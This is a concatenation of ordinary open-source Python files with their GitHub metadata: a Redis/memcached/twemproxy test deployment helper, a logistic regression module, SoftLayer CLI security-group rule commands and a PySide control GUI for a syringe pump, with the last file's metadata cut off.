    if prefix and 'prefix' not in kwargs:
        kwargs['prefix'] = prefix
    kwargs['output_stream'] = ostream

    self.git.archive(treeish, **kwargs)
    return self
# Bind the module-level rev_parse function as a method of this class.
rev_parse = rev_parse
def __repr__(self):
return '<git.Repo "%s">' % self.git_dir
| {
"content_hash": "01d3f57ae0adaf1d56e89d7604757469",
"timestamp": "",
"source": "github",
"line_count": 762,
"max_line_length": 144,
"avg_line_length": 32.351706036745405,
"alnum_prop": 0.6875709881551193,
"repo_name": "ArnoVanLumig/set-seminar",
"id": "8882f66455240c660fd9679f71349b65b1481ae1",
"size": "24869",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "git/repo/base.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "557283"
},
{
"name": "Ruby",
"bytes": "46005"
}
],
"symlink_target": ""
} |
import os
import sys
import socket
from utils import *
import conf
class Base:
'''
Base class for a deployable/controllable server instance (python 2).

Sub class should implement:
_alive, _pre_deploy, status, and init self.args
'''
def __init__(self, name, host, port, path):
self.args = {
'name' : name,
'host' : host,
'port' : port,
'path' : path,
# startcmd and runcmd are used to generate the control script:
# startcmd is the command used to start the server,
'startcmd' : '',
# runcmd is the process name as seen in `ps -aux`, used to build the stop cmd
'runcmd' : '',
'logfile' : '',
}
def __str__(self):
# TT is a template helper (from utils); substitutes $name etc. from args.
return TT('[$name:$host:$port]', self.args)
def deploy(self):
# Create the standard instance layout, then delegate to the subclass.
logging.info('deploy %s' % self)
self._run(TTCMD('mkdir -p $path/bin && \
mkdir -p $path/conf && \
mkdir -p $path/log && \
mkdir -p $path/data',
self.args))
self._pre_deploy()
self._gen_control_script()
def _gen_control_script(self):
# Render conf/control.sh with this instance's args and install it
# executable as ${name}_control. NOTE: file() and 0755 are python-2 only.
content = file(os.path.join(WORKDIR, 'conf/control.sh')).read()
content = TT(content, self.args)
control_filename = TT('${path}/${name}_control', self.args)
fout = open(control_filename, 'w+')
fout.write(content)
fout.close()
os.chmod(control_filename, 0755)
def start(self):
# Start via the control script, then poll with exponential backoff
# (capped at 5s) until _alive() reports success.
if self._alive():
logging.warn('%s already running' %(self) )
return
logging.debug('starting %s' % self)
t1 = time.time()
sleeptime = .1
cmd = TT("cd $path && ./${name}_control start", self.args)
self._run(cmd)
while not self._alive():
lets_sleep(sleeptime)
if sleeptime < 5:
sleeptime *= 2
else:
sleeptime = 5
logging.warn('%s still not alive' % self)
t2 = time.time()
logging.info('%s start ok in %.2f seconds' %(self, t2-t1) )
def stop(self):
# Stop via the control script and block until the process is gone.
if not self._alive():
logging.warn('%s already stop' %(self) )
return
cmd = TT("cd $path && ./${name}_control stop", self.args)
self._run(cmd)
t1 = time.time()
while self._alive():
lets_sleep()
t2 = time.time()
logging.info('%s stop ok in %.2f seconds' %(self, t2-t1) )
def pid(self):
# Match the exact run command to find the instance's pid(s).
cmd = TT("pgrep -f '^$runcmd'", self.args)
return self._run(cmd)
def status(self):
logging.warn("status: not implement")
def _alive(self):
logging.warn("_alive: not implement")
def _run(self, raw_cmd):
# system() is a utils helper returning the command's output as a string.
ret = system(raw_cmd, logging.debug)
logging.debug('return : [%d] [%s] ' % (len(ret), shorten(ret)) )
return ret
def clean(self):
# Destructive: removes the whole instance directory.
cmd = TT("rm -rf $path", self.args)
self._run(cmd)
def host(self):
return self.args['host']
def port(self):
return self.args['port']
class RedisServer(Base):
# A managed redis-server instance; see Base for the lifecycle contract.
def __init__(self, host, port, path, cluster_name, server_name, auth = None):
Base.__init__(self, 'redis', host, port, path)
self.args['startcmd'] = TT('bin/redis-server conf/redis.conf', self.args)
self.args['runcmd'] = TT('redis-server \*:$port', self.args)
self.args['conf'] = TT('$path/conf/redis.conf', self.args)
self.args['pidfile'] = TT('$path/log/redis.pid', self.args)
self.args['logfile'] = TT('$path/log/redis.log', self.args)
self.args['dir'] = TT('$path/data', self.args)
self.args['REDIS_CLI'] = conf.BINARYS['REDIS_CLI']
self.args['cluster_name'] = cluster_name
self.args['server_name'] = server_name
self.args['auth'] = auth
def _info_dict(self):
# Parse `redis-cli INFO` output ("key:value" lines) into a defaultdict.
cmd = TT('$REDIS_CLI -h $host -p $port INFO', self.args)
if self.args['auth']:
cmd = TT('$REDIS_CLI -h $host -p $port -a $auth INFO', self.args)
info = self._run(cmd)
info = [line.split(':', 1) for line in info.split('\r\n')
if not line.startswith('#')]
info = [i for i in info if len(i) > 1]
# NOTE: missing keys silently yield '' because this is a defaultdict(str).
return defaultdict(str, info) #this is a defaultdict, be Notice
def _ping(self):
cmd = TT('$REDIS_CLI -h $host -p $port PING', self.args)
if self.args['auth']:
cmd = TT('$REDIS_CLI -h $host -p $port -a $auth PING', self.args)
return self._run(cmd)
def _alive(self):
# Alive iff the PING reply contains PONG.
return strstr(self._ping(), 'PONG')
def _gen_conf(self):
# Render conf/redis.conf from the template; append requirepass if auth set.
content = file(os.path.join(WORKDIR, 'conf/redis.conf')).read()
content = TT(content, self.args)
if self.args['auth']:
content += '\r\nrequirepass %s' % self.args['auth']
return content
def _pre_deploy(self):
self.args['BINS'] = conf.BINARYS['REDIS_SERVER_BINS']
self._run(TT('cp $BINS $path/bin/', self.args))
fout = open(TT('$path/conf/redis.conf', self.args), 'w+')
fout.write(self._gen_conf())
fout.close()
def status(self):
uptime = self._info_dict()['uptime_in_seconds']
if uptime:
logging.info('%s uptime %s seconds' % (self, uptime))
else:
logging.error('%s is down' % self)
def isslaveof(self, master_host, master_port):
# Returns True when already replicating from the given master;
# returns None (falsy) otherwise.
info = self._info_dict()
if info['master_host'] == master_host and \
int(info['master_port']) == master_port:
logging.debug('already slave of %s:%s' % (master_host, master_port))
return True
def slaveof(self, master_host, master_port):
cmd = 'SLAVEOF %s %s' % (master_host, master_port)
return self.rediscmd(cmd)
def rediscmd(self, cmd):
# Run an arbitrary command through redis-cli; deepcopy keeps self.args clean.
args = copy.deepcopy(self.args)
args['cmd'] = cmd
cmd = TT('$REDIS_CLI -h $host -p $port $cmd', args)
logging.info('%s %s' % (self, cmd))
return self._run(cmd)
class Memcached(Base):
    """A managed memcached instance; see Base for the lifecycle contract."""

    def __init__(self, host, port, path, cluster_name, server_name):
        Base.__init__(self, 'memcached', host, port, path)
        # memcached is started directly, so the start and run commands match.
        self.args['startcmd'] = TT('bin/memcached -u root -d -p $port', self.args)
        self.args['runcmd'] = self.args['startcmd']
        self.args['cluster_name'] = cluster_name
        self.args['server_name'] = server_name

    def _alive(self):
        """Probe liveness by piping the `stats` command over a raw TCP pipe."""
        reply = self._run(TT('echo "stats" | socat - TCP:$host:$port', self.args))
        return strstr(reply, 'END')

    def _pre_deploy(self):
        """Install the memcached binaries into the instance's bin directory."""
        self.args['BINS'] = conf.BINARYS['MEMCACHED_BINS']
        self._run(TT('cp $BINS $path/bin/', self.args))
class NutCracker(Base):
# A managed twemproxy (nutcracker) proxy in front of redis/memcached masters.
def __init__(self, host, port, path, cluster_name, masters, mbuf=512,
verbose=5, is_redis=True, redis_auth=None):
Base.__init__(self, 'nutcracker', host, port, path)
self.masters = masters
self.args['mbuf'] = mbuf
self.args['verbose'] = verbose
self.args['redis_auth'] = redis_auth
self.args['conf'] = TT('$path/conf/nutcracker.conf', self.args)
self.args['pidfile'] = TT('$path/log/nutcracker.pid', self.args)
self.args['logfile'] = TT('$path/log/nutcracker.log', self.args)
# Stats/status listener runs on a fixed offset above the proxy port.
self.args['status_port'] = self.args['port'] + 1000
# NOTE(review): binary is named 'nutcrackers' (plural) here - appears
# intentional for this fork; confirm it matches the shipped binary.
self.args['startcmd'] = TTCMD('bin/nutcrackers -d -c $conf -o $logfile \
-p $pidfile -s $status_port \
-v $verbose -m $mbuf -i 1', self.args)
self.args['runcmd'] = TTCMD('bin/nutcrackers -d -c $conf -o $logfile \
-p $pidfile -s $status_port', self.args)
self.args['cluster_name']= cluster_name
self.args['is_redis']= str(is_redis).lower()
def _alive(self):
# Alive iff the status port answers with parseable JSON.
return self._info_dict()
def _gen_conf_section(self):
# One "- host:port:weight name" line per master server.
template = ' - $host:$port:1 $server_name'
cfg = '\n'.join([TT(template, master.args) for master in self.masters])
return cfg
def _gen_conf(self):
content = '''
$cluster_name:
listen: 0.0.0.0:$port
hash: fnv1a_64
distribution: modula
preconnect: true
auto_eject_hosts: false
redis: $is_redis
backlog: 512
timeout: 400
client_connections: 0
server_connections: 1
server_retry_timeout: 2000
server_failure_limit: 2
servers:
'''
if self.args['redis_auth']:
content = content.replace('redis: $is_redis',
'redis: $is_redis\r\n redis_auth: $redis_auth')
content = TT(content, self.args)
return content + self._gen_conf_section()
def _pre_deploy(self):
self.args['BINS'] = conf.BINARYS['NUTCRACKER_BINS']
self._run(TT('cp $BINS $path/bin/', self.args))
fout = open(TT('$path/conf/nutcracker.conf', self.args), 'w+')
fout.write(self._gen_conf())
fout.close()
def version(self):
#This is nutcracker-0.4.0
# NOTE(review): relies on $BINS, which is only set by _pre_deploy - confirm
# version() is never called before deploy().
s = self._run(TT('$BINS --version', self.args))
return s.strip().replace('This is nutcracker-', '')
def _info_dict(self):
# Query the JSON stats listener; returns None when unreachable.
try:
sock=socket.socket()
sock.connect((self.args['host'], self.args['status_port']))
sock.send('status\r\n')
ret=sock.recv(10000)
sock.close()
return json_decode(ret)
except Exception, e:
logging.debug('can not get _info_dict of nutcracker, \
[Exception: %s]' % (e, ))
return None
def reconfig(self, masters):
# Full restart-based reconfiguration: stop, redeploy config, start.
self.masters = masters
self.stop()
self.deploy()
self.start()
logging.info('proxy %s:%s is updated' % (self.args['host'], self.args['port']))
def logfile(self):
return self.args['logfile']
def cleanlog(self):
cmd = TT("rm '$logfile'", self.args)
self._run(cmd)
def signal(self, signo):
self.args['signo'] = signo
cmd = TT("pkill -$signo -f '^$runcmd'", self.args)
self._run(cmd)
def reload(self):
# twemproxy reloads its configuration on SIGUSR1.
self.signal('USR1')
def set_config(self, content):
# Write a new config verbatim and hot-reload the proxy.
fout = open(TT('$path/conf/nutcracker.conf', self.args), 'w+')
fout.write(content)
fout.close()
self.reload()
| {
"content_hash": "f2058c8ec02d9b01e59973cb38bd4ba2",
"timestamp": "",
"source": "github",
"line_count": 319,
"max_line_length": 87,
"avg_line_length": 32.58307210031348,
"alnum_prop": 0.5299211083317299,
"repo_name": "vipshop/twemproxies",
"id": "8771dc96ceeed63d765c20fb06566441e03d1c44",
"size": "10505",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/lib/server_modules.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "646969"
},
{
"name": "C++",
"bytes": "8390"
},
{
"name": "M4",
"bytes": "6440"
},
{
"name": "Makefile",
"bytes": "3042"
},
{
"name": "Python",
"bytes": "43478"
},
{
"name": "Shell",
"bytes": "59512"
}
],
"symlink_target": ""
} |
'''
Created on Oct 27, 2015
Logistic Regression Working Module
@author: Gu
'''
from numpy import *
def loadDataSet():
    """Load the 2-feature demo data set from 'testSet.txt'.

    Each row of the returned feature matrix is [1.0, x1, x2]; the leading
    1.0 is the bias term. Returns (dataMat, labelMat).
    """
    dataMat = []
    labelMat = []
    for line in open('testSet.txt').readlines():
        tokens = line.strip().split()
        dataMat.append([1.0, float(tokens[0]), float(tokens[1])])
        labelMat.append(int(tokens[2]))
    return dataMat, labelMat
def sigmoid(inX):
    """Logistic function: maps a real number (or ndarray) into (0, 1)."""
    denominator = 1 + exp(-inX)
    return 1.0 / denominator
def gradAscent(dataMatIn, classLabels):
    """Batch gradient ascent for logistic regression.

    :param dataMatIn: 2-d sequence of samples (rows) by features (columns)
    :param classLabels: sequence of 0/1 labels, one per sample
    :return: (n, 1) numpy matrix of learned weights"""
    X = mat(dataMatIn)                   # m x n sample matrix
    y = mat(classLabels).transpose()     # m x 1 label column vector
    m, n = shape(X)
    alpha = 0.001                        # learning rate
    maxCycles = 500                      # fixed iteration budget
    weights = ones((n, 1))
    for _ in range(maxCycles):
        # Vectorized prediction for every sample, then one weight update.
        h = sigmoid(X * weights)
        weights = weights + alpha * X.transpose() * (y - h)
    return weights
def plotBestFit(weights):
    """Scatter both classes and draw the boundary w0 + w1*x + w2*y = 0."""
    import matplotlib.pyplot as plt
    dataMat, labelMat = loadDataSet()
    dataArr = array(dataMat)
    pos_x, pos_y = [], []
    neg_x, neg_y = [], []
    for i in range(shape(dataArr)[0]):
        if int(labelMat[i]) == 1:
            pos_x.append(dataArr[i, 1])
            pos_y.append(dataArr[i, 2])
        else:
            neg_x.append(dataArr[i, 1])
            neg_y.append(dataArr[i, 2])
    fig = plt.figure()
    ax = fig.add_subplot(111)
    ax.scatter(pos_x, pos_y, s=30, c='red', marker='s')
    ax.scatter(neg_x, neg_y, s=30, c='green')
    x = arange(-3.0, 3.0, 0.1)
    # The decision boundary is where sigmoid(w . x) == 0.5, i.e. w . x == 0.
    y = (-weights[0] - weights[1] * x) / weights[2]
    ax.plot(x, y)
    plt.xlabel('X1')
    plt.ylabel('X2')
    plt.show()
def stocGradAscent0(dataMatrix, classLabels):
    """Single-pass stochastic gradient ascent with a constant step size.

    :param dataMatrix: 2-d numpy array of samples
    :param classLabels: sequence of 0/1 labels
    :return: 1-d numpy array of weights"""
    m, n = shape(dataMatrix)
    alpha = 0.01
    weights = ones(n)  # initialize to all ones
    for i in range(m):
        # Per-sample prediction and correction.
        prediction = sigmoid(sum(dataMatrix[i] * weights))
        residual = classLabels[i] - prediction
        weights = weights + alpha * residual * dataMatrix[i]
    return weights
def stocGradAscent1(dataMatrix, classLabels, numIter=150):
    """Improved stochastic gradient ascent.

    The step size decays with the iteration count and samples are drawn in
    random order without replacement within each pass.

    :param dataMatrix: 2-d numpy array of samples
    :param classLabels: sequence of 0/1 labels
    :param numIter: number of full passes over the data
    :return: 1-d numpy array of weights"""
    m, n = shape(dataMatrix)
    weights = ones(n)  # initialize to all ones
    for j in range(numIter):
        # BUGFIX: on python 3, range() is an immutable view and del fails;
        # materialize it as a list (also fine on python 2).
        dataIndex = list(range(m))
        for i in range(m):
            # alpha decreases with iteration but never reaches 0 thanks to
            # the additive constant, so late samples still move the weights.
            alpha = 4 / (1.0 + j + i) + 0.0001
            randIndex = int(random.uniform(0, len(dataIndex)))
            # NOTE(review): randIndex indexes dataMatrix directly rather than
            # dataIndex[randIndex]; kept as in the original - confirm intent.
            h = sigmoid(sum(dataMatrix[randIndex] * weights))
            error = classLabels[randIndex] - h
            weights = weights + alpha * error * dataMatrix[randIndex]
            del dataIndex[randIndex]
    return weights
def classifyVector(inX, weights):
    """Threshold the logistic score at 0.5 to produce a 1.0/0.0 label."""
    score = sigmoid(sum(inX * weights))
    return 1.0 if score > 0.5 else 0.0
def colicTest():
    """Train on horseColicTraining.txt and evaluate on horseColicTest.txt.

    Each line holds 21 tab-separated feature values followed by the label.
    :return: error rate observed on the test file"""
    def _features(cells):
        # First 21 columns are the feature vector.
        return [float(cells[k]) for k in range(21)]

    frTrain = open('horseColicTraining.txt')
    frTest = open('horseColicTest.txt')

    trainingSet = []
    trainingLabels = []
    for line in frTrain.readlines():
        cells = line.strip().split('\t')
        trainingSet.append(_features(cells))
        trainingLabels.append(float(cells[21]))
    trainWeights = stocGradAscent1(array(trainingSet), trainingLabels, 1000)

    errorCount = 0
    numTestVec = 0.0
    for line in frTest.readlines():
        numTestVec += 1.0
        cells = line.strip().split('\t')
        if int(classifyVector(array(_features(cells)), trainWeights)) != int(cells[21]):
            errorCount += 1
    errorRate = (float(errorCount) / numTestVec)
    print ("the error rate of this test is: %f" % errorRate)
    return errorRate
def multiTest():
    """Run colicTest() ten times and report the average error rate."""
    numTests = 10
    errorSum = 0.0
    for _ in range(numTests):
        errorSum += colicTest()
    print ("after %d iterations the average error rate is: %f" % (numTests, errorSum/float(numTests)))
if __name__ == '__main__':
    # Leftover smoke check. Previously it ran unconditionally at import time,
    # printing to stdout whenever the module was imported; keep it behind the
    # main guard so importing this module has no side effects.
    weights = ones((3, 1))
    print(weights)
| {
"content_hash": "36743bf2ee1a5f151926206ec8fa01dc",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 102,
"avg_line_length": 34.93043478260869,
"alnum_prop": 0.6163803833706746,
"repo_name": "nicepear/machine-learning",
"id": "bfc79b975ad61c333078d17afe085f6d94547a86",
"size": "4017",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "logRegres.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8105"
}
],
"symlink_target": ""
} |
"""Manage security group rules."""
# :license: MIT, see LICENSE for more details.
import click
import SoftLayer
from SoftLayer.CLI import environment
from SoftLayer.CLI import exceptions
from SoftLayer.CLI import formatting
# Columns rendered by `sg rule-list`; also the valid --sortby choices.
COLUMNS = ['id',
'remoteIp',
'remoteGroupId',
'direction',
'ethertype',
'portRangeMin',
'portRangeMax',
'protocol',
'createDate',
'modifyDate']
# Columns for simple mutation responses: the request id and its response.
REQUEST_BOOL_COLUMNS = ['requestId', 'response']
# Columns for rule-creating responses: the request id and the created rules.
REQUEST_RULES_COLUMNS = ['requestId', 'rules']
@click.command()
@click.argument('securitygroup_id')
@click.option('--sortby',
              help='Column to sort by',
              type=click.Choice(COLUMNS))
@environment.pass_env
def rule_list(env, securitygroup_id, sortby):
    """List security group rules."""
    mgr = SoftLayer.NetworkManager(env.client)

    table = formatting.Table(COLUMNS)
    table.sortby = sortby

    for rule in mgr.list_securitygroup_rules(securitygroup_id):
        # Port bounds may legitimately be absent; render None as a blank
        # (0 is a valid bound and must be kept as-is).
        port_min = rule.get('portRangeMin')
        port_max = rule.get('portRangeMax')
        table.add_row([
            rule['id'],
            rule.get('remoteIp') or formatting.blank(),
            rule.get('remoteGroupId') or formatting.blank(),
            rule['direction'],
            rule.get('ethertype') or formatting.blank(),
            formatting.blank() if port_min is None else port_min,
            formatting.blank() if port_max is None else port_max,
            rule.get('protocol') or formatting.blank(),
            rule.get('createDate') or formatting.blank(),
            rule.get('modifyDate') or formatting.blank(),
        ])

    env.fout(table)
@click.command()
@click.argument('securitygroup_id')
@click.option('--remote-ip', '-r',
help='The remote IP/CIDR to enforce')
@click.option('--remote-group', '-s', type=click.INT,
help='The ID of the remote security group to enforce')
@click.option('--direction', '-d',
help=('The direction of traffic to enforce '
'(ingress, egress)'))
@click.option('--ethertype', '-e',
help='The ethertype (IPv4 or IPv6) to enforce')
@click.option('--port-max', '-M', type=click.INT,
help=('The upper port bound to enforce. When the protocol is ICMP, '
'this specifies the ICMP code to permit'))
@click.option('--port-min', '-m', type=click.INT,
help=('The lower port bound to enforce. When the protocol is ICMP, '
'this specifies the ICMP type to permit'))
@click.option('--protocol', '-p',
help='The protocol (icmp, tcp, udp) to enforce')
@environment.pass_env
def add(env, securitygroup_id, remote_ip, remote_group,
direction, ethertype, port_max, port_min, protocol):
"""Add a security group rule to a security group.
\b
Examples:
# Add an SSH rule (TCP port 22) to a security group
slcli sg rule-add 384727 \\
--direction ingress \\
--protocol tcp \\
--port-min 22 \\
--port-max 22
\b
# Add a ping rule (ICMP type 8 code 0) to a security group
slcli sg rule-add 384727 \\
--direction ingress \\
--protocol icmp \\
--port-min 8 \\
--port-max 0
"""
mgr = SoftLayer.NetworkManager(env.client)
# Delegate validation of the rule fields to the API call.
ret = mgr.add_securitygroup_rule(securitygroup_id, remote_ip, remote_group,
direction, ethertype, port_max,
port_min, protocol)
# A falsy return indicates the API rejected the request.
if not ret:
raise exceptions.CLIAbort("Failed to add security group rule")
table = formatting.Table(REQUEST_RULES_COLUMNS)
table.add_row([ret['requestId'], str(ret['rules'])])
env.fout(table)
@click.command()
@click.argument('securitygroup_id')
@click.argument('rule_id')
@click.option('--remote-ip', '-r',
              help='The remote IP/CIDR to enforce')
@click.option('--remote-group', '-s',
              help='The ID of the remote security group to enforce')
@click.option('--direction', '-d',
              help='The direction of traffic to enforce')
@click.option('--ethertype', '-e',
              help='The ethertype (IPv4 or IPv6) to enforce')
@click.option('--port-max', '-M',
              help='The upper port bound to enforce')
@click.option('--port-min', '-m',
              help='The lower port bound to enforce')
@click.option('--protocol', '-p',
              help='The protocol (icmp, tcp, udp) to enforce')
@environment.pass_env
def edit(env, securitygroup_id, rule_id, remote_ip, remote_group,
         direction, ethertype, port_max, port_min, protocol):
    """Edit a security group rule in a security group."""
    mgr = SoftLayer.NetworkManager(env.client)

    # Only forward the options the user actually supplied; port bounds use
    # an explicit None check because 0 is a valid value.
    data = {}
    if remote_ip:
        data['remote_ip'] = remote_ip
    if remote_group:
        data['remote_group'] = remote_group
    if direction:
        data['direction'] = direction
    if ethertype:
        data['ethertype'] = ethertype
    if port_max is not None:
        data['port_max'] = port_max
    if port_min is not None:
        data['port_min'] = port_min
    if protocol:
        data['protocol'] = protocol

    ret = mgr.edit_securitygroup_rule(securitygroup_id, rule_id, **data)
    if not ret:
        raise exceptions.CLIAbort("Failed to edit security group rule")

    table = formatting.Table(REQUEST_BOOL_COLUMNS)
    # BUGFIX: REQUEST_BOOL_COLUMNS declares two columns ('requestId',
    # 'response') but only one value was added, which makes the table
    # renderer reject the row. Emit both values.
    # NOTE(review): assumes the API response carries a 'response' field, as
    # the column name suggests - confirm against the manager's return value.
    table.add_row([ret['requestId'], str(ret.get('response'))])
    env.fout(table)
@click.command()
@click.argument('securitygroup_id')
@click.argument('rule_id')
@environment.pass_env
def remove(env, securitygroup_id, rule_id):
    """Remove a rule from a security group."""
    network_manager = SoftLayer.NetworkManager(env.client)

    # The API returns a falsy value when the rule could not be removed.
    result = network_manager.remove_securitygroup_rule(securitygroup_id,
                                                       rule_id)
    if not result:
        raise exceptions.CLIAbort("Failed to remove security group rule")

    output = formatting.Table(REQUEST_BOOL_COLUMNS)
    output.add_row([result['requestId']])
    env.fout(output)
| {
"content_hash": "92fc2990e39077d3a39db016a5e7feb2",
"timestamp": "",
"source": "github",
"line_count": 187,
"max_line_length": 82,
"avg_line_length": 32.63101604278075,
"alnum_prop": 0.5981645362176335,
"repo_name": "kyubifire/softlayer-python",
"id": "6d6c33c62bcfb997c28d2882a7b66cef9a39d26d",
"size": "6102",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SoftLayer/CLI/securitygroup/rule.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "DIGITAL Command Language",
"bytes": "854"
},
{
"name": "Makefile",
"bytes": "7458"
},
{
"name": "Python",
"bytes": "1957876"
}
],
"symlink_target": ""
} |
"""
Python Implementation for the Cavro XP3000 GUI.
The GUI is designed with regards to the MVC (Model View Controller)
Ui architectural pattern. Inside this module the View - Controller behaviors
are implemented while the Model behavior is implemented in the imported module:
pump_model.py
"""
# Sat May 24 10:57:50 EEST 2014, nickkouk
# proper division for python 2.7
from __future__ import division
# Usual importing stuff
from PySide.QtGui import *
from PySide.QtCore import *
# Module imports
import sys
import python_gui # Designer outcome
import python_settings
import serial
import time
__appname__ = "XP3000 Interface"
# pump_oriented settings
addr = '/1'   # pump address prefix prepended to every command -- TODO confirm protocol
term = 'R\r'  # command terminator ('R' presumably means "execute") -- TODO confirm
class MainWindow(QMainWindow, python_gui.Ui_MainWindow):
    """Main application window.

    Wires the Qt-Designer generated UI (python_gui) to the pump's serial
    protocol and owns the background thread that polls the pump status.
    """
    def __init__(self, parent=None):
        super(MainWindow, self).__init__(parent)
        self.setupUi(self)
        self.setWindowTitle(__appname__)
        # Connection settings
        self.port_name = 'loop://'  # loopback URL: writes echo back (test mode)
        self.baud = 9600
        self.byte_size = 8
        self.par = 'N'
        self.stopb = 1
        self.timeout_time = 0  # 0 => non-blocking reads
        self.addr = addr
        self.term = term
        self.ser = serial.serial_for_url(self.port_name, timeout = self.timeout_time)
        #self.ser.open()
        # Threading for non-blocking behavior
        self.updateThread = updateThread(self)
        self.updateThread.start()
        # TODO Pump settings
        self.plung_pos = 0
        self.valve_pos = 'O'
        self.plung_speed = 1
        self.syr_size = 50 # The size of the syringe is 50 micro litre
        self.steps_tot = 3000
        # NOTE(review): valve_pos is assigned twice ('O' above, '0' here);
        # one of the two literals is presumably a typo -- confirm intent.
        self.valve_pos = '0'
        # Connecting signals to functions
        self.connect(self.output_btn, SIGNAL("clicked()"), self.output_fun)
        self.connect(self.input_btn, SIGNAL("clicked()"), self.input_fun)
        self.connect(self.bypass_btn, SIGNAL("clicked()"), self.bypass_fun)
        self.connect(self.speed_slider, SIGNAL("sliderReleased()"), self.setSpeed)
        self.connect(self.speed_spinbox, SIGNAL("editingFinished()"), self.setSpeed)
        self.connect(self.volume_prompt, SIGNAL("returnPressed()"), self.volume_command)
        self.connect(self.actionReports, SIGNAL("triggered()"), self.reportsThread_start)
        # Action Signals - Slots
        self.connect(self.actionNew_Device, SIGNAL("triggered()"), self.newDev)
        #self.connect(self.actionReports, SIGNAL("triggered()"), self.reports_dialog)
        # Latest pump status snapshot; refreshed by update_values().
        self.status = {}
    def reportsThread_start(self):
        # Spawn the reports worker, then show the modal Reports dialog.
        self.reportsThread = reportsThread(self.status)
        self.reportsThread.start()
        reports = Reports_class()
        reports.exec_()
    def close_window(self):
        # Placeholder slot -- not implemented yet.
        pass
    def open_btn(self):
        # Placeholder slot -- not implemented yet.
        pass
    def save_btn(self):
        # Placeholder slot -- not implemented yet.
        pass
    def newDev(self):
        # Let the user pick a new serial device through a file dialog.
        #TODO have to fix the device search filter
        QMessageBox.information(self, "New Pump Configuration", "Select the device name")
        # Platform specific
        # NOTE(review): the two `if`s are not chained; on Windows the `else`
        # below re-assigns dir='.' anyway (same value), but an if/elif chain
        # was probably intended. `dir` also shadows the builtin.
        if sys.platform[:3] == 'win':
            dir = '.' # Windows device path?!
        if sys.platform[:3] == 'dar':
            dir = '~/src/python' # Should include this for compatibility issues
        else:
            dir = '.'
        fileObj = QFileDialog.getOpenFileName(self, "New Pump Configuration", dir=dir)
        if fileObj[0]:
            # NOTE(review): sets `port_name` on the serial object; pyserial's
            # attribute is `port`, so this may have no effect -- verify.
            self.ser.port_name = fileObj[0]
    def update_values(self):
        """
        The purpose of this function is to constantly update the settings
        related to the pump, should be run by a thread periodically
        """
        # keep the gathering info
        status = {"abs_pos": '', "top_vel": '', "cutoff": '',\
                "act_pos": '', "start": '', "backlash": '', "fluid": '',\
                "buffer": '', "version": '', "checksum": ''}
        # reading info mechanism
        # Each query writes "<addr><query><term>" and reads back up to 8 bytes.
        self.ser.write(self.addr + '?' + self.term)
        status["abs_pos"] = self.ser.read(8)
        self.ser.write(self.addr + '?1' + self.term)
        status["start"] = self.ser.read(8)
        self.ser.write(self.addr + '?2' + self.term)
        status["top_vel"] = self.ser.read(8)
        self.ser.write(self.addr + '?3' + self.term)
        status["cutoff"] = self.ser.read(8)
        self.ser.write(self.addr + '?4' + self.term)
        status["act_pos"] = self.ser.read(8)
        self.ser.write(self.addr + '?12' + self.term)
        status["backlash"] = self.ser.read(8)
        self.ser.write(self.addr + '?22' + self.term)
        status["fluid"] = self.ser.read(8)
        self.ser.write(self.addr + 'F' + self.term)
        status["buffer"] = self.ser.read(8)
        self.ser.write(self.addr + '&' + self.term)
        status["version"] = self.ser.read(8)
        self.ser.write(self.addr + '#' + self.term)
        status["checksum"] = self.ser.read(8)
        self.status = status
    def volume_command(self):
        """
        This function calculates the steps needed to deliver the volume,
        checks if it can be delivered and updates the plunger position and
        down_remaining steps
        """
        vol = self.volume_prompt.text()
        if not vol.isdigit():
            QMessageBox.warning(self, __appname__, "Please enter a numerical value")
            self.volume_prompt.selectAll()
            return
        vol = float(vol)
        # Convert requested volume (micro litres) into motor steps.
        steps = self.steps_tot / self.syr_size * vol
        if self.PushBtn.isChecked():
            # Dispensing: plunger moves down, position decreases.
            if self.plung_pos - steps < 1:# Check for validity of the command
                QMessageBox.warning(self,__appname__, "Not a valid value")
                self.volume_prompt.selectAll()
                return
            else:
                self.plung_pos -= steps
                #self.ser.write(self.addr + 'D' + steps + self.term)
        else:
            # Aspirating: plunger moves up, position increases.
            if self.plung_pos + steps > self.steps_tot:
                # print "plunge position: {}".format(self.plung_pos)
                #print "steps: {}".format(steps)
                # print "steps_total: {}".format(self.steps_tot)
                QMessageBox.warning(self, __appname__, "Exceeds the available space")
                self.volume_prompt.selectAll()
                return
            else:
                self.plung_pos += steps
                #self.ser.write(self.addr + 'P' + steps + self.term)
        print "Plunger Position: {}".format(self.plung_pos)
class updateThread(QThread):
    """Worker thread that keeps the pump status fresh.

    Calls ``window.update_values()`` once per second so the GUI never
    blocks on serial I/O.
    """
    def __init__(self, window, parent=None):
        super(updateThread, self).__init__(parent)
        self.window = window
    def run(self):
        # Poll forever; the thread dies with the application.
        win = self.window
        while True:
            win.update_values()
            time.sleep(1)
class reportsThread(QThread):
    """Thread reserved for pushing pump status into the Reports dialog.

    The widget updates are not wired up yet, so ``run`` is currently a
    no-op; the status dict is kept for the future implementation.
    """
    def __init__(self, status, parent=None):
        super(reportsThread, self).__init__(parent)
        self.status = status
    def run(self):
        # TODO: populate the Reports dialog line-edits from self.status.
        pass
class Reports_class(QDialog, python_settings.Ui_Dialog):
    """Modal dialog displaying the pump status reports."""
    def __init__(self, parent=None):
        super(Reports_class, self).__init__(parent)
        self.setupUi(self)
        title = "Reports Screen"
        self.setWindowTitle(title)
if __name__ == '__main__':
    # Launch the Qt application and hand control to its event loop.
    app = QApplication(sys.argv)
    main_window = MainWindow()
    main_window.show()
    app.exec_()
| {
"content_hash": "ae09e0b8a4f591ff2bdf3ce4092f765f",
"timestamp": "",
"source": "github",
"line_count": 233,
"max_line_length": 89,
"avg_line_length": 34.23175965665236,
"alnum_prop": 0.5962888665997994,
"repo_name": "bergercookie/Pump3000",
"id": "9a18bfcaaac8ab72ad37e8d1d992dbd58cb152d0",
"size": "7999",
"binary": false,
"copies": "1",
